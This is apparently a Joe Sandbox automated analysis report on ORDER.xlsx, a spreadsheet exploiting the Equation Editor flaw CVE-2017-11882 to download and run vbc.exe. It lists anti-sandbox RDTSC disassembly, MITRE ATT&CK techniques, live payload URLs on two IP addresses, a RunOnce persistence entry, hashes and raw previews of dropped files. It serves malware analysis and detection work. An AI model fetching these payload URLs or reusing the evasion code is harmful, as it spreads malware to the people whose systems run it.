Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000000369799 second address: 0000000000369799 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 29D86A1Dh 0x00000007 sub eax, 1A2EF41Ch 0x0000000c xor eax, 7F8AA893h 0x00000011 xor eax, 7023DE93h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FF3F0AF7358h 0x0000001e lfence 0x00000021 mov edx, 100ABEA1h 0x00000026 xor edx, 6F0D7B68h 0x0000002c xor edx, 62879C8Ah 0x00000032 xor edx, 627E5957h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FF3F0AF739Ah 0x0000003f test ax, cx 0x00000042 cmp ecx, edx 0x00000044 test ebx, eax 0x00000046 cmp edx, 8B44DCE9h 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 add edi, edx 0x00000052 dec dword ptr [ebp+000000F8h] 0x00000058 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005f jne 00007FF3F0AF72E8h 0x00000061 jmp 00007FF3F0AF739Eh 0x00000063 test edx, 67D05910h 0x00000069 call 00007FF3F0AF73A3h 0x0000006e call 00007FF3F0AF7379h 0x00000073 lfence 0x00000076 mov edx, 100ABEA1h 0x0000007b xor edx, 6F0D7B68h 0x00000081 xor edx, 62879C8Ah 0x00000087 xor edx, 627E5957h 0x0000008d mov edx, dword ptr [edx] 0x0000008f lfence 0x00000092 jmp 00007FF3F0AF739Ah 0x00000094 test ax, cx 0x00000097 cmp ecx, edx 0x00000099 test ebx, eax 0x0000009b cmp edx, 8B44DCE9h 0x000000a1 ret 0x000000a2 mov esi, edx 0x000000a4 pushad 0x000000a5 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003664E7 mov eax, dword ptr fs:[00000030h]	6_2_003664E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB mov eax, dword ptr fs:[00000030h]	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036929E mov eax, dword ptr fs:[00000030h]	6_2_0036929E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336 mov eax, dword ptr fs:[00000030h]	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B mov eax, dword ptr fs:[00000030h]	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00368B74 mov eax, dword ptr fs:[00000030h]	6_2_00368B74
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB mov eax, dword ptr fs:[00000030h]	6_2_003643BB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER.xlsx	29%	Virustotal		Browse
ORDER.xlsx	26%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin	2%	Virustotal		Browse
http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://212.192.246.25/reverse/vbc.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://212.192.246.25/reverse/vbc.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	false		high
http://investor.msn.com	vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	false		high
http://www.day.com/dam/1.0	ED60BCE4.emf.0.dr	false		high
http://investor.msn.com/	vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.192.246.25	unknown	Russian Federation		205220	RHC-HOSTINGGB	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	482999
Start date:	14.09.2021
Start time:	12:12:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/27@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.9% (good quality ratio 0.9%) Quality average: 62.4% Quality standard deviation: 8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:13:44	API Interceptor	46x Sleep call for process: EQNEDT32.EXE modified
12:15:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.192.246.25	Inquiry Sheet.xlsx	Get hash	malicious	Browse	212.192.246.25/excel/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RHC-HOSTINGGB	Inquiry Sheet.xlsx	Get hash	malicious	Browse	212.192.246.25
	01_extracted.exe	Get hash	malicious	Browse	212.192.246.191
	CHECKLIST INQ 1119.vbs	Get hash	malicious	Browse	212.192.246.191
	DOCU_SIGN8289292930001028839.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	53t6VeSUO5.exe	Get hash	malicious	Browse	212.192.246.56
	1p34FDbhjW.exe	Get hash	malicious	Browse	212.192.246.176
	eli.exe	Get hash	malicious	Browse	212.192.246.242
	eli.exe	Get hash	malicious	Browse	212.192.246.242
	rfq-aug-09451.exe	Get hash	malicious	Browse	212.192.246.250
	Nd1eFNdNeE.exe	Get hash	malicious	Browse	212.192.246.73
	J5U0QK6IhH.exe	Get hash	malicious	Browse	212.192.246.147
	RF 2001466081776.doc	Get hash	malicious	Browse	212.192.246.147
	HalkbankEkstre1608219773667200308882717534.ex.exe	Get hash	malicious	Browse	212.192.246.93

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	135168
Entropy (8bit):	6.627142296963667
Encrypted:	false
SSDEEP:	3072:Uig2P/gdml1DDkiWgc/MLo6Ot57sOilam+hiwIYo4tdfF5oj:UwHgdQvkhgWM86Yhilam+hiwIYo4tdtc
MD5:	4E7BC50BF6D2B8EF86A4C4926E049AD9
SHA1:	F5C4808765D3157BE4E56890370BD65877C3E056
SHA-256:	EC482DE17E558209134FCBCA7223336509A9023AC929A666A597BF91DBAC339E
SHA-512:	F5AD28B1511E6DB884206FA069CEE11A792F24FE57B244D0F3E052BE6094BAFED2F5AF716DA3511D67C62B023D67840A57A7012AF96363D161648DED57918728
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://212.192.246.25/reverse/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L......J............................p.............@..........................P.......7......................................d...(.......:;..................................................................8... .......$............................text...4........................... ..`.data...dE..........................@....rsrc...:;.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\139565FE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19629329.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\199B2685.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B80892.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B0761E7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\844FB223.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB00B8D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B06673B1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
